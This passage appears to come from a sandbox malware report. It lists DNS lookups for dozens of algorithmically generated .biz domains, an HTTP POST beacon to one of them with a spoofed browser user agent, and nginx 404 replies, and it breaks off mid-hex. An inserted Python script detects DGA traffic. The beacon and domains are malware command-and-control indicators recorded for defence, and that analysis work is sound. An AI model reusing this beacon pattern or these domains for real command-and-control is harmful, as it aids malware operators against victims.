                        Source: global traffic | DNS traffic detected: DNS query: yauexmxk.biz
                        Source: global traffic | DNS traffic detected: DNS query: iuzpxe.biz
                        Source: global traffic | DNS traffic detected: DNS query: sxmiywsfv.biz
                        Source: global traffic | DNS traffic detected: DNS query: vrrazpdh.biz
                        Source: global traffic | DNS traffic detected: DNS query: ftxlah.biz
                        Source: global traffic | DNS traffic detected: DNS query: typgfhb.biz
                        Source: global traffic | DNS traffic detected: DNS query: esuzf.biz
                        Source: global traffic | DNS traffic detected: DNS query: gvijgjwkh.biz
                        Source: global traffic | DNS traffic detected: DNS query: qpnczch.biz
                        Source: global traffic | DNS traffic detected: DNS query: brsua.biz
                        Source: global traffic | DNS traffic detected: DNS query: dlynankz.biz
                        Source: global traffic | DNS traffic detected: DNS query: oflybfv.biz
                        Source: global traffic | DNS traffic detected: DNS query: yhqqc.biz
                        Source: global traffic | DNS traffic detected: DNS query: mnjmhp.biz
                        Source: global traffic | DNS traffic detected: DNS query: opowhhece.biz
                        Source: global traffic | DNS traffic detected: DNS query: zjbpaao.biz
                        Source: global traffic | DNS traffic detected: DNS query: jdhhbs.biz
                        Source: global traffic | DNS traffic detected: DNS query: mgmsclkyu.biz
                        Source: global traffic | DNS traffic detected: DNS query: warkcdu.biz
                        Source: global traffic | DNS traffic detected: DNS query: gcedd.biz
                        Source: global traffic | DNS traffic detected: DNS query: jwkoeoqns.biz
                        Source: global traffic | DNS traffic detected: DNS query: xccjj.biz
                        Source: global traffic | DNS traffic detected: DNS query: hehckyov.biz
                        Source: global traffic | DNS traffic detected: DNS query: rynmcq.biz
                        Source: global traffic | DNS traffic detected: DNS query: uaafd.biz
                        Source: global traffic | DNS traffic detected: DNS query: eufxebus.biz
                        Source: global traffic | DNS traffic detected: DNS query: pwlqfu.biz
                        Source: global traffic | DNS traffic detected: DNS query: rrqafepng.biz
                        Source: global traffic | DNS traffic detected: DNS query: ctdtgwag.biz
                        Source: global traffic | DNS traffic detected: DNS query: tnevuluw.biz
                        Source: global traffic | DNS traffic detected: DNS query: whjovd.biz
                        Source: global traffic | DNS traffic detected: DNS query: gjogvvpsf.biz
                        Source: global traffic | DNS traffic detected: DNS query: reczwga.biz
                        Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
                        Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
                        Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
                        Source: global trafficDNS traffic detected: DNS query: ywffr.biz
                        Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
                        Source: global trafficDNS traffic detected: DNS query: pectx.biz
                        Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
                        Source: global trafficDNS traffic detected: DNS query: banwyw.biz
                        Source: global trafficDNS traffic detected: DNS query: muapr.biz
                        Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
                        Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
                        Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
                        Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
                        Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
                        Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
                        Source: global trafficDNS traffic detected: DNS query: uphca.biz
                        Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
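Triage of the DNS queries listed above, as an added example that is not part of the Joe Sandbox report or of the sample's own code. The 62 names are copied from the report; the benign comparison names, the two per-name heuristics (longest consonant run, vowel ratio) and every threshold are assumptions made for this illustration. The per-name heuristic is deliberately cheap and misses several of the shorter, vowel-rich names (yunalwv, vyome, brsua and a few others), which is why the script also counts distinct registrable domains per TLD: one host resolving dozens of never-seen names under a single TLD in a short run is the signal that holds up regardless of how pronounceable any individual name is.

```python
"""DGA triage for the DNS queries a sandboxed sample was seen resolving.

Added example, not part of the Joe Sandbox report or the analysed sample.
Thresholds and the benign name list are assumptions for this illustration.
"""
from collections import Counter

VOWELS = set("aeiou")

# The 62 names the sandbox saw the sample resolve (copied from the report above).
REPORT_DNS_QUERIES = """
ytctnunms.biz myups.biz oshhkdluh.biz yunalwv.biz jpskm.biz lrxdmhrr.biz wllvnzb.biz
gnqgo.biz jhvzpcfg.biz acwjcqqv.biz lejtdj.biz vyome.biz yauexmxk.biz iuzpxe.biz
sxmiywsfv.biz vrrazpdh.biz ftxlah.biz typgfhb.biz esuzf.biz gvijgjwkh.biz qpnczch.biz
brsua.biz dlynankz.biz oflybfv.biz yhqqc.biz mnjmhp.biz opowhhece.biz zjbpaao.biz
jdhhbs.biz mgmsclkyu.biz warkcdu.biz gcedd.biz jwkoeoqns.biz xccjj.biz hehckyov.biz
rynmcq.biz uaafd.biz eufxebus.biz pwlqfu.biz rrqafepng.biz ctdtgwag.biz tnevuluw.biz
whjovd.biz gjogvvpsf.biz reczwga.biz bghjpy.biz damcprvgv.biz ocsvqjg.biz ywffr.biz
ecxbwt.biz pectx.biz zyiexezl.biz banwyw.biz muapr.biz wxgzshna.biz zrlssa.biz
jlqltsjvh.biz xyrgy.biz htwqzczce.biz kvbjaur.biz uphca.biz fjumtfnz.biz
""".split()

# Constructed benign names, used only to show the heuristics do not fire on them.
BENIGN_QUERIES = ["microsoft.com", "google.com", "github.com", "wikipedia.org",
                  "cloudflare.com", "windowsupdate.com", "amazon.com"]


def registrable_label(name: str) -> str:
    """Second-level label of a name, e.g. 'ytctnunms' for 'ytctnunms.biz'."""
    parts = name.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def longest_consonant_run(label: str) -> int:
    """Longest run of non-vowel characters ('y', digits and '-' count as consonants)."""
    best = run = 0
    for ch in label:
        run = 0 if ch in VOWELS else run + 1
        best = max(best, run)
    return best


def vowel_ratio(label: str) -> float:
    return sum(ch in VOWELS for ch in label) / max(len(label), 1)


def is_dga_like(name: str, max_run: int = 4, min_vowel_ratio: float = 0.25) -> bool:
    """Per-name heuristic: an unpronounceable consonant cluster or almost no vowels.
    Deliberately crude; short vowel-rich names such as 'yunalwv' slip past it."""
    label = registrable_label(name)
    return longest_consonant_run(label) >= max_run or vowel_ratio(label) < min_vowel_ratio


def distinct_domains_per_tld(names) -> Counter:
    """Count distinct registrable domains per TLD. A burst under one TLD is the
    robust DGA signal even when the individual names look pronounceable."""
    seen = set()
    for n in names:
        parts = n.lower().rstrip(".").split(".")
        if len(parts) >= 2:
            seen.add((parts[-1], parts[-2]))
    return Counter(tld for tld, _ in seen)


def dga_burst_alert(names, threshold: int = 20) -> list:
    """TLDs whose distinct-domain count reaches the (assumed) alert threshold."""
    return sorted(tld for tld, n in distinct_domains_per_tld(names).items() if n >= threshold)


def triage(names) -> dict:
    flagged = [n for n in names if is_dga_like(n)]
    return {"total": len(names), "flagged_by_name": len(flagged),
            "burst_tlds": dga_burst_alert(names)}


if __name__ == "__main__":
    print("report:", triage(REPORT_DNS_QUERIES))
    print("benign:", triage(BENIGN_QUERIES))
```

The per-name rules flag roughly four in five of the report's names and none of the benign ones, while the per-TLD count fires on the whole batch at once; in a real pipeline the count would be taken over a sliding time window per source host, which the report's unordered listing does not provide.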
                        Source: unknown | HTTP traffic detected: POST /bimwjsl HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            Host: pywolwnvd.biz
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                            Content-Length: 828
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:28 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:28 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:39 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:39 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:42 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:42 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 